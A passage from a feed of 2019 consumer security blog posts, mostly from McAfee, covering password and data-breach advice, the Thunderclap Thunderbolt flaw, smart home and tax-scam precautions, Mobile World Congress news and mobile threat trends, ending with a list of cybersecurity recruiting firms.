Now that you’ve made sure that your passwords are bulletproof, make sure you have comprehensive security software that can protect you from a wide variety of threats.

Tricks:

  • Keep your software up-to-date and consider using a web advisor that protects you from accidentally typing passwords into phishing sites.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post 5 Tips For Creating Bulletproof Passwords appeared first on McAfee Blogs.

809 Million Records Left Exposed: How Users Can Protect Their Data

It’s no secret that technological advancements and online threats are directly proportional to each other. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of advanced malware attacks and massive data leaks. Speaking of the latter — less than two months after the Collection #1 data breach exposed 773 million email addresses, it seems we have another massive data dump in our midst. Last week, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm, Verifications.io.

You may be wondering how Verifications.io had so much data left to be exposed. Most people have heard of email marketing, but very few realize that these companies often vet user email addresses to ensure their validity. Enter Verifications.io. This company serves as a way email marketing firms can outsource the extensive work involved with validating mass amounts of emails and avoid the risk of having their infrastructure blacklisted by spam filters. Verifications.io was entrusted with a lot of data provided by email marketing firms looking to streamline their processes, creating an information-heavy database.

This unusual data trove contains tons of sensitive information like names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, social media accounts, and characterizations of people’s credit scores. While the data doesn’t contain Social Security Numbers or credit card information, that amount of aggregated data makes it much easier for cybercriminals to run new social engineering scams or expand their target audience. According to security researcher Troy Hunt, owner of HaveIBeenPwned, 35% of the data exposed by Verifications.io is new to his database. With that said, it was the second largest data dump added in terms of email addresses to Hunt’s website, which allows users to check whether their data has been exposed or breached.

Upon discovery, the firm was made aware of the incident. And while proper security measures were taken, users can take various steps themselves to protect their information in the event of large-scale data exposure. Check out the following tips:

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your individual accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords on a consistent basis to further protect your data.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 809 Million Records Left Exposed: How Users Can Protect Their Data appeared first on McAfee Blogs.

Don’t Let Thunderclap Flaws Strike Your Device

If you own a Mac or PC, odds are you’ve used your laptop’s Thunderbolt port to connect another device to your machine. Thunderbolt ports are convenient for charging other devices using your laptop or desktop’s battery power. However, a new flaw called Thunderclap allows attackers to steal sensitive information such as passwords, encryption keys, financial information, or run detrimental code on the system if a malicious device is plugged into a machine’s port while it’s running.

So, how can attackers exploit this flaw? Thunderbolt accessories are granted direct-memory access (DMA), which is a method of transferring data from a computer’s random-access memory (RAM) to another part of the computer without it needing to pass through the central processing unit (CPU). DMA can save processing time and is a more efficient way to move data from the computer’s memory to other devices. However, attackers with physical access to the computer can take advantage of DMA by running arbitrary code on the device plugged into the Thunderbolt port. This allows criminals to steal sensitive data from the computer. Mind you, Thunderclap vulnerabilities also provide cybercriminals with direct and unlimited access to the machine’s memory, allowing for greater malicious activity.

Thunderclap-based attacks can be carried out with either specially built malicious peripheral devices or common devices such as projectors or chargers that have been altered to automatically attack the host they are connected to. What’s more, they can compromise a vulnerable computer in just a matter of seconds. Researchers who discovered this vulnerability informed manufacturers and fixes have been deployed, but it’s always good to take extra precautions. So, here are some ways users can defend themselves against these flaws:

  • Disable the Thunderbolt interface on your computer. To remove Thunderbolt accessibility on a Mac, go to the Network Preference panel, click “OK” on the New Interface Detected dialog, and select “Thunderbolt Bridge” from the sidebar. Click the [-] button to delete the option as a networking interface and choose “Apply.” PCs often allow users to disable Thunderbolt in BIOS or UEFI firmware settings, which connect a computer’s firmware to its operating system.
  • Don’t leave your computer unattended. Because this flaw requires a cybercriminal to have physical access to your device, make sure you keep a close eye on your laptop or PC to ensure no one can plug anything into your machine without permission.
  • Don’t borrow chargers or use publicly available charging stations. Public chargers may have been maliciously altered without your knowledge, so always use your own computer accessories.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Don’t Let Thunderclap Flaws Strike Your Device appeared first on McAfee Blogs.

International Women’s Day 2019: How can we be better allies?

Every year on March 8, we celebrate International Women's Day to honor the social, economic, cultural and political achievements of women. But we also acknowledge that there is still a long way to go before we’ve truly reached gender parity. This day gives us the opportunity to reflect on how we can achieve that balance. So it’s particularly fitting that the theme of this year’s International Women’s Day is “Balance for Better”.

The post International Women’s Day 2019: How can we be better allies? appeared first on WeLiveSecurity

How To Secure Your Smart Home

Do you live in a “smart” home? If you look around and see interactive speakers, IP cameras, and other internet-connected devices like thermostats and appliances, you are now one of the millions of people who live with so-called “smart” devices. They bring convenience and comfort into our lives, but they also bring greater risks, by giving cybercrooks new opportunities to access our information, and even launch attacks.

You may remember a couple of years ago when thousands of infected devices were used to take down the websites of internet giants like Twitter and Netflix by overwhelming them with traffic. The owners of those devices were regular consumers, who had no idea that their IP cameras and DVRs had been compromised. You may also have heard stories of people who were eavesdropped on via their baby monitors, digital assistants, and webcams when their private networks were breached.

Unfortunately, these are not rare cases. In recent months, the “Internet of Things” (IoT) has been used repeatedly to spy on businesses, launch attacks, or even deliver cryptojacking malware or ransomware.

Still, given the benefits we get from these devices, they are probably here to stay. We just need to acknowledge that today’s “smart” devices can be a little “dumb” when it comes to security. Many lack built-in security protections, and consumers are still learning about the risks they can pose. This is particularly concerning since the market for smart devices is large and growing. There are currently 7 billion IoT devices being used worldwide, and that number is expected to grow to 22 billion by 2025.

Cybercrooks have already taken note of these opportunities since malware attacks on smart devices have escalated rapidly. In fact, McAfee reported that malware directed at IoT devices was up 73% in the third quarter of 2018 alone.

So, whether you have one IoT device, or many, it’s worth learning how to use them safely.

Follow these smart home safety tips:

  • Research before you buy—Although most IoT devices don’t have built-in protection, some are safer than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks many of these features, consider upgrading it.
  • Safeguard your devices—Before you connect a new IoT device to your home network — allowing it to potentially connect with other data-rich devices, like smartphones and computers — change the default username and password to something strong, and unique. Hackers often know the default settings and share them online. Then, turn off any manufacturer settings that do not benefit you, like remote access. This is a feature some manufacturers use to monitor their products, but it could also be used by cybercrooks to access your system. Finally, make sure that your device software is up-to-date by checking the manufacturer’s website. This ensures that you are protected from any known vulnerabilities.
  • Secure your network—Your router is the central hub that connects all of the devices in your home, so you need to make sure that it’s secure. If you haven’t already, change the default password and name of your router. Make sure your network name does not give away your address, so hackers can’t locate it. Then check that your router is using an encryption method, like WPA2, which will keep your communications secure. Consider setting up a “guest network” for your IoT devices. This is a second network on your router that allows you to keep your computers and smartphones separate from IoT devices. So, if a device is compromised, a hacker still cannot get to all the valuable information that is saved on your computers. Check your router’s manual for instructions on how to set up a guest network. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.
  • Install comprehensive security software—Finally, use comprehensive security software that can safeguard all your devices and data from known vulnerabilities and emerging threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post How To Secure Your Smart Home appeared first on McAfee Blogs.

How to Steer Clear of Tax Season Scams

*This blog contains research discovered by Elizabeth Farrell

It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.

So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.

In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. Even back in December, we saw a surge of new email phishing scams trying to fool consumers into thinking the message was coming from the IRS or other members of the tax community. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.

Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.

Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are concerned about how much they might owe or are predicting how much they’ll get back on their tax refund, and scammers play to both of these emotions. So, as hundreds of taxpayers are waiting for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:

  • File before cybercriminals do it for you. The easiest defense you can take against tax season schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.
  • Obtain a copy of your credit report. FYI – you’re entitled to a free copy of your credit report from each of the major bureaus once a year. So, make it a habit to request a copy of your file every three to four months, each time from a different credit bureau. That way, you can keep better track of and monitor any suspicious activity and act early if something appears fishy.
  • Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Be wary of strange file attachment names such as “virus-for-you.doc.” Remember: the IRS only contacts people by snail mail, so if you get an email from someone claiming to be from the IRS, stay away.
  • Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
  • Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blogs.

What MWC 2019 Shows Us About the Future of Connectivity

The time has come to say goodbye to Barcelona as we wrap up our time here at Mobile World Congress (MWC). Although it’s hard to believe that the show is already over, MWC 2019 managed to deliver a slew of showstoppers that captured our attention. Here are some of my main takeaways from the event:

Foldable Phones Are the Future

MWC is an opportunity for telecommunications companies, chipmakers, and smartphone firms to show off their latest and greatest innovations, and they sure delivered this year. One particular device that had the show floor buzzing was the Huawei Mate X, a 5G-enabled smartphone that folds out to become an 8-inch tablet. Additionally, Samsung revealed its plans to hold a press event in early April for its foldable smartphone, the Galaxy Fold. Unlike Huawei’s Mate X, the Galaxy Fold bends so that it closes like a book. Although neither of these devices is available to the public yet, they’ve definitely made a bold statement when it comes to smartphone design.

Smart Home Technology Goes Mobile

Google is one company taking advantage of smartphone enhancements by putting its Google Assistant into the Android texting app. Assistant for Android Messages allows slices of Google search results to be laid out for users based on their text messages. For example, if one user texted another asking to grab some lunch, a bubble would pop up authorizing Assistant to share suggestions for nearby restaurant locations. While Assistant for Android currently only works for movies and restaurants, we can imagine how this technology could expand to other facets of consumer lives. This addition also demonstrates how AI is slowly but surely making its way onto almost every high-end phone through its apps and other tools.

Enhancing the Gaming Experience with 5G, VR, and AR

Not to be shown up, gaming developers also made a statement by using 5G technology to bring gamers into a more immersive gaming environment. Mobile game developer Niantic, creator of Pokémon Go and the upcoming Harry Potter: Wizards Unite app, is already working on games that will require a 5G upgrade. One such prototype the company showcased, codenamed Neon, allows multiple people in the same place to play an augmented reality (AR) game at the same time. Each player’s phone shows them the game’s graphics superimposed on the real world and allows the players to shoot each other, duck and dodge, and pick up virtual items, all in real-time.

Niantic wasn’t the only one looking to expand the gaming experience with the help of 5G. At the Intel and Nokia booths, Sony set up an Oculus Rift VR game inspired by Marvel and Sony’s upcoming film Spider-Man: Far From Home. Thanks to the low latency and real-time responsiveness of 5G, one player in the Nokia booth was able to race the other player in the Intel booth as if they were swinging through spiderwebs in Manhattan. Players were able to experience how the next-generation of wireless technology will allow them to participate in a highly immersive gaming experience.

Bringing 4G and 5G to the Automotive Industry

Gaming isn’t the only industry that’s getting a facelift from 5G. At the show, Qualcomm announced two new additions to their automotive platform: the Qualcomm Snapdragon Automotive 4G and 5G Platforms. One of the main features of these platforms is cellular vehicle-to-everything communication, or C-V2X, which allows a car to communicate with other vehicles on the road, roadside infrastructure, and more. In addition, the platforms offer a high-precision, multi-frequency global navigation satellite system, which will help enable self-driving implementations. The platforms also include features like multi-gigabit cloud connectivity, high-bandwidth, low-latency teleoperations support, and precise positioning for lane-level navigation accuracy. These advancements in connectivity will potentially help future vehicles to improve safety, communications, and the overall in-car experience for consumers.

Securing Consumers On-the-Go

The advancements in mobile connectivity have already made a huge impact on consumer lifestyles, especially given the widespread adoption of IoT devices and smart gadgets. But the rise in popularity of these devices has also caught the interest of malicious actors looking to access users’ networks. According to our latest Mobile Threat Report, cybercriminals look to trusted devices to gain access to other devices on the user’s home network. For example, McAfee researchers recently discovered a vulnerability within a Mr. Coffee brand coffee maker that could allow a malicious actor to access the user’s home network. In addition, they also uncovered a new vulnerability within BoxLock smart padlocks that could enable cybercriminals to unlock the devices within a matter of seconds.

And while consumers must take necessary security steps to combat vulnerabilities such as these, we at McAfee are also doing our part to help users everywhere remain secure. For instance, we’ve recently extended our partnerships with both Samsung and Türk Telekom in order to overcome some of these cybersecurity challenges. Together, we’re working to secure consumers from cyberthreats on Samsung Galaxy S10 smartphones and provide McAfee Safe Family protection for Türk Telekom’s fixed and mobile broadband customers.

While the likes of 5G, bendable smartphones, and VR took this year’s tradeshow by storm, it’s important for consumers to keep the cybersecurity implications of these advancements in mind. As the sun sets on our time here in Barcelona, we will keep working to safeguard every aspect of the consumer lifestyle so they can embrace improvements in mobile connectivity with confidence.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What MWC 2019 Shows Us About the Future of Connectivity appeared first on McAfee Blogs.

McAfee Partners With Telefónica To Help Secure Consumers Worldwide

These days, cyberattacks can feel relentless. Due to the interconnected nature of the world we live in, cybercriminals have managed to infiltrate our personal devices, our networks, and even our homes. That’s why we at McAfee believe it’s important now more than ever to secure every facet of the modern consumer lifestyle. And we’ve partnered with Telefónica to do just that.

This partnership first began back in February of last year, when ElevenPaths, Telefónica Cyber Security Unit, and McAfee announced we’re working together to reinforce the online security of Telefónica’s broadband and mobile customers across multiple markets. This partnership covers Europe and Latin America with plans to progressively roll out solutions in the different countries where Telefónica operates. It’s the first time a telecommunications company has delivered a security service to all of its customers, regardless of where they connect from. Fast forward to present day, and this partnership has only expanded. The global product developed by Telefónica and powered by McAfee was first launched in Spain as Movistar Conexión Segura, a service that protects home and mobile customers’ connectivity. Telefónica protects Fusión customers’ home connections with a smart router, thanks to the ElevenPaths solution powered by McAfee Secure Home Platform, which enables seamless security and easy activation. Conexión Segura is also available for Movistar mobile customers, including network protection and one license of Seguridad Dispositivo, a multi-device security protection. Only a few weeks after Spain, Movistar Argentina launched the solution for its fixed and mobile customers. These services help realize Telefónica’s “Security by Default” strategy, offering customers a more robust security solution that protects against threats like viruses, malware, phishing, and emerging IoT threats.

Telefónica and McAfee’s 360 partnership is dedicated to protecting the productivity of consumers everywhere. “This agreement gives customers current and contextual information on their cybersecurity status so they can stay connected with confidence,” said Pedro Pablo Pérez, Global Security VP of Telefónica and CEO of ElevenPaths, Telefónica Cybersecurity Unit.

ElevenPaths and McAfee’s joint vision to create a more secure tomorrow brings us a step closer to stopping widespread cyberattacks. By joining forces to implement more robust security solutions around the world, we can ensure that our connectivity goes undisrupted. Because together is power.

To learn more about consumer security and our approach to it, be sure to follow us at @ElevenPaths and @McAfee.

The post McAfee Partners With Telefónica To Help Secure Consumers Worldwide appeared first on McAfee Blogs.

Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report

These days, we seem to have a newfound reliance on all things ‘smart.’ We give these devices the keys to our digital lives, entrusting them with tons of personal information. In fact, we are so eager to adopt this technology that we connect 4,800 devices per minute to the internet with no sign of slowing down. This is largely because smart devices make our lives easier and enjoyable. But even though these devices are convenient, it’s important to understand they’re also convenient for cybercriminals, given they contain a treasure trove of personal data. To examine how exactly these hackers plan on capturing that data, we at McAfee have taken a deep dive into the mobile threat landscape in this year’s Mobile Threat Report. In this report, we examine some of the most significant threat trends, including new spyware, mobile malware, and IoT attack surfaces. Let’s take a look at these trends and how you can keep all your devices protected.

Operations RedDawn and FoulGoal

In our 2018 report, we predicted that attacks targeted toward mobile devices would increase, and everything from fake Fortnite apps to increased mobile malware has proven this to be true. However, two recent discoveries, Operation RedDawn and FoulGoal, prove just how targeted these attacks can really get. RedDawn, in particular, has set its sights on North Korean refugees, as the spyware attempts to copy photos, contacts, SMS messages, and other personal data belonging to the victim.

The latter attack, FoulGoal, actually occurred during last year’s World Cup, as the campaign used an app called Golden Cup to install spyware on victims’ devices. This app promised users live streams of games from the Russian 2018 FIFA World Cup, as well as a searchable database of previous World Cup records. In addition to stealing the user’s phone number, device details, and installed packages, FoulGoal also downloaded spyware to expand its infection into SMS messages, contacts, GPS details, and audio recordings.

A Virtual Backdoor

Our smartphones are now like remote controls for our smart homes, controlling everything from lights to locks to kitchen appliances. So, it was only a matter of time before cybercriminals looked for ways to trick users into leaving open a virtual backdoor. Enter TimpDoor, an Android-based malware family that does just that. First appearing in March 2018, it quickly became the leading mobile backdoor family, as it runs an SMiShing campaign that tricks users into downloading fake voice-messaging apps.

These virtual backdoors are now an ever-growing threat as hackers begin to take advantage of the always-connected nature of mobile phones and other connected devices. Once distributed as Trojanized apps through app stores, like Google Play, these backdoors can come disguised as add-on games or customization tools. And while most are removed fairly quickly from app stores, hackers can still pivot their distribution efforts and leverage popular websites to conceive a socially engineered attack that tricks users into enabling unknown sources.

The Voice Heard Around the Home

Around the world, there are already over 25 million voice assistants, or smart speakers, in use. From simple queries to controlling other IoT gadgets throughout the home, these devices play a big role in our living environments. But many of these IoT devices fail to pass even the most basic security practices, and have easily guessable passwords, notable buffer overflow issues, and unpatched vulnerabilities. This makes voice assistants an increasingly valuable and potentially profitable attack vector for cybercrime.

For a typical voice assistant in the home, the attack surface is quite broad. Cybercriminals could gain access to the microphone or listening stream, and then monitor everything said. Additionally, they could command the speakers to perform actions via other speaker devices, such as embedding commands in a TV program or internet video. Crooks could even alter customized actions to somehow aid their malicious schemes. However, some of the most pressing vulnerabilities can come from associated IoT devices, such as smart plugs, door locks, cameras, or connected appliances, which can have their own flaws and could provide unrestrained access to the rest of the home network.

The good news? We at McAfee are working tirelessly to evolve our home and mobile solutions to keep you protected from any current and future threats. Plus, there are quite a few steps you can personally take to secure your devices. Start by following these tips:

  • Delete apps at the first sign of suspicious activity. If an app requests access to anything outside of its service, or didn’t originate from a trusted source, remove it immediately from your device.
  • Protect your devices by protecting your home network. While we continue to embrace the idea of “smart homes” and connected devices, we also need to embrace the idea that with great connectivity comes great responsibility to secure those connections. Consider built-in network security, which can automatically secure your connected devices at the router level.
  • Keep your security software up-to-date. Whether it’s an antivirus solution or a comprehensive security suite, always keep your security solutions up-to-date. Software and firmware patches are ever-evolving and are made to combat newly discovered threats, so be sure to update every time you’re prompted to. Better yet, flip on automatic updates.
  • Change your device’s factory security settings. When it comes to products, many manufacturers don’t think “security first.” That means your device can be potentially vulnerable as soon as you open the box. By changing the factory settings you’re instantly upping your smart device’s security.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report appeared first on McAfee Blogs.

Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships

We’ve touched down in Barcelona for Mobile World Congress 2019 (MWC), which is looking to stretch the limits of mobile technology with new advancements made possible by the likes of IoT and 5G. This year, we are excited to announce the unveiling of our 2019 Mobile Threat Report, our extended partnership with Samsung to protect Galaxy S10 smartphones, and our strengthened partnership with Türk Telekom to provide a security solution to protect families online.

Mobile Connectivity and the Evolving Threat Landscape

These days, it’s a rare occurrence to enter a home that isn’t utilizing smart technology. Devices like smart TVs, voice assistants, and security cameras make our lives more convenient and connected. However, as consumers adopt this technology into their everyday lives, cybercriminals find new ways to exploit these devices for malicious activity. With an evolving threat landscape, cybercriminals are shifting their tactics in response to changes in the market. As we revealed in our latest Mobile Threat Report, malicious actors look for ways to maximize their profit, primarily through gaining control of trusted IoT devices like voice assistants. There are over 25 million voice assistants in use across the globe and many of these devices are connected to other things like thermostats, door locks, and smart plugs. With this increase in connectivity, cybercriminals have more opportunities to exploit users’ devices for malicious purposes. Additionally, cybercriminals are leveraging users’ reliance on their mobile phones to mine for cryptocurrency without the device owner’s knowledge. According to our Mobile Threat Report, cybersecurity researchers found more than 600 malicious cryptocurrency apps spread across 20 different app stores. In order to protect users during this time of rapid IoT and mobile growth, we here at McAfee are pushing to deliver solutions for relevant, real-world security challenges with the help of our partners.

Growing Partnerships to Protect What Matters

Some cybersecurity challenges we are working to overcome include threats like mobile malware and unsecured Wi-Fi. This year, we’ve extended our long-standing partnership with Samsung to help secure consumers from cyberthreats on Samsung Galaxy S10 smartphones. McAfee is also supporting Samsung Secure Wi-Fi service by providing backend infrastructure to protect consumers from risky Wi-Fi. In addition to mobile, this partnership also expands to help protect Samsung smart TVs, PCs, and laptops.

We’ve also strengthened our partnership with Türk Telekom, Turkey’s largest fixed broadband ISP. Last year, we announced this partnership to deliver cross-device security protection. This year, we’re providing a security solution to help parents protect their family’s digital lives. Powered by McAfee Safe Family, Türk Telekom’s fixed and mobile broadband customers will have the option to benefit from robust parental controls. These controls will allow parents to better manage their children’s online experience and give them greater peace of mind.

We’re excited to see what’s to come for the rest of MWC, and how these announcements will help improve consumers’ digital experiences. It is our hope that by continuing to extend our relationships with technology innovators, we can help champion built-in security across devices and networks.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships appeared first on McAfee Blogs.

Best Cybersecurity Search Firms & Recruiters 2019

As cybersecurity becomes more and more popular each day, it’s also important to mention that there is a shortage of skilled people within the industry. Many recruiters create specific cybersecurity departments so they can stay competitive and fill the gap. According to Forbes, the cybersecurity market is expected to hit $170 billion by 2020, and cybersecurity jobs are expected to reach 6 million by the end of 2019. It’s not a secret that the rapid growth rate of the industry requires a professional approach from some of the best infosec recruiters.

In a recent interview, Karla Jobling from BeecherMadden (a top UK cybersecurity recruiter) reveals that at first cybersecurity companies wanted to hire as many people as possible. Now, however, they are more focused on finding not many people, but just the right people for the right position. It is extremely important for a recruiter to match the candidate’s expectations with the requirements and the corporate culture of the client company.

List of best cybersecurity search firms for 2019

Shield Security Recruiters

A leading global recruiting firm focused on the Cyber Security industry in the USA, Europe, APAC and LATAM. Shield Security Recruiters have the global expertise and knowledge to bring you the quality Cyber Security candidates you deserve, expect and need.

3P&T Security Recruiting

3P&T has been successful in recruiting people in various areas of cybersecurity. They are one of the best cybersecurity recruiters in the Seattle, USA area.

Adeptis Group

A great UK-based company which is extremely trusted among infosec professionals in Europe. They are always ready to provide expert advice to their clients.

Alta Associates

Alta Associates is based in New Jersey, USA and performs custom searches for the most senior level executive roles in the cyber industry. They also deal with risk management, privacy, compliance and governance.

Acumin Consulting

The company is based in London, but they operate internationally with a special focus on cybersecurity and risk management recruitment. They specialize in providing key infosec and law enforcement skills across all sectors.

Blackmere Consulting

This company focuses on quality, speed and cost effectiveness to provide a more specialized approach to sourcing the best talent in cybersecurity. Their services include direct hire, consulting or hiring on a contract for a specific project.

Caliber Security Partners

Their specialty is recruiting and staff augmentation in the short or the long term. They establish trusting relationships with their clients to identify their true talent needs. Another good addition to our cybersecurity search firms list.

Computer Futures

The company provides a platform both for companies looking for potential talent and for people who are looking for a career in the cybersecurity industry. They have a dedicated cyber security and business risk team that provides individual solutions.

Cyber Exec

Cyber Exec is headquartered in Houston, Texas, but also operates internationally in cities like Tokyo and London. They definitely know how to find the best C-level employees.

CISORecruiter

As the name suggests, this company is a team of professionals that will take care of your needs and provide you with the right people for your cybersec company.

Cyber Security Recruiters

This company is among the best cybersecurity search firms in the state of Minnesota, USA and has been in business since 2009.

Cyber 360 Inc.

Another top cybersecurity recruiter that works together with some of the biggest cybersecurity leaders and their teams to hire skilled information security professionals.

InfoSec People

The company was launched in 2008 and is currently one of the leading cybersecurity recruitment companies in the UK. You can easily find a role, find people or find advice on their website.

KnownFour

Another UK company, whose owners have been in international recruiting services for more than 20 years. Their information security department works closely with experts to provide the perfect solution to their clients.

Redbud Cyber Security

Redbud has a national reach in the USA and is looking to source all kinds of positions, from Analysts and Engineers to CISOs. They are well known within the industry and can provide some of the best cyber talent.

Security Recruiter

The firm serves clients globally in the fields of information security, corporate security, risk management, governance, compliance and business intelligence.

This was our latest list of cybersecurity search firms. We hope that you will find what you need. Feel free to contact us if you want to add a company to our list.

The post Best Cybersecurity Search Firms & Recruiters 2019 appeared first on CyberDB.